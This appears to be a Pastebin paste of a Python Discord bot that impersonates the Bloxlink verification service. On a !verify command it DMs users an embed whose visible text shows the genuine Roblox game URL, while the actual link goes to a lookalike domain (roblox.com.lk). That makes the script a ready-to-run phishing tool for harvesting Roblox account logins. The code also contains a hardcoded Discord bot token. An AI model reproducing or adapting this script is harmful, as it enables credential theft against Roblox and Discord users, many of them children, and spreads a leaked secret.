Advertisement
Bacon_Script

Untitled

Jun 30th, 2024
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.20 KB | None | 0 0
  1. import discord
  2. from discord.ext import commands
  3.  
  4. intents = discord.Intents.all()
  5.  
  6. # Settings (Change these to whatever you want)
  7. token = "MTI1NzAzMTE0NjE2MDUyMTI0Ng.Gobp55.KTDtaERzpzZiPOEy3WCMxBahMNHrujGj1NUEMk"
  8. prefix = "!"
  9. title = "Please Complete Verification"
  10. desc = "To verify your account, please join BloxLink's Official Roblox Verification Game"
  11. field = "Please Login and join the game!"
  12. hyperlink = "https://www.roblox.com/games/1271943503/Bloxlink-Verification-Game"
  13. fake_link = "https://www.roblox.com.lk/share?code=c74b19fd9d47cd948352199642efa07a&type=Server"
  14.  
  15. client = commands.Bot(command_prefix=prefix, intents=intents)
  16. client.remove_command('help')
  17.  
  18. @client.event
  19. async def on_ready():
  20. print('')
  21. print('----------------')
  22. print('Bloxlink is Online!')
  23. print('----------------')
  24.  
  25. main = discord.Embed(title=title, description=desc, color=0xcf4948)
  26. main.add_field(name=field, value=f"[{hyperlink}]({fake_link})")
  27. main.set_thumbnail(url='https://avatars.githubusercontent.com/u/39774496?s=200&v=4')
  28.  
  29. @client.command()
  30. async def verify(ctx):
  31. await ctx.send('Sent Verification Link! Please Check DMs')
  32. await ctx.author.send(embed=main)
  33.  
  34. client.run(token)
  35.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement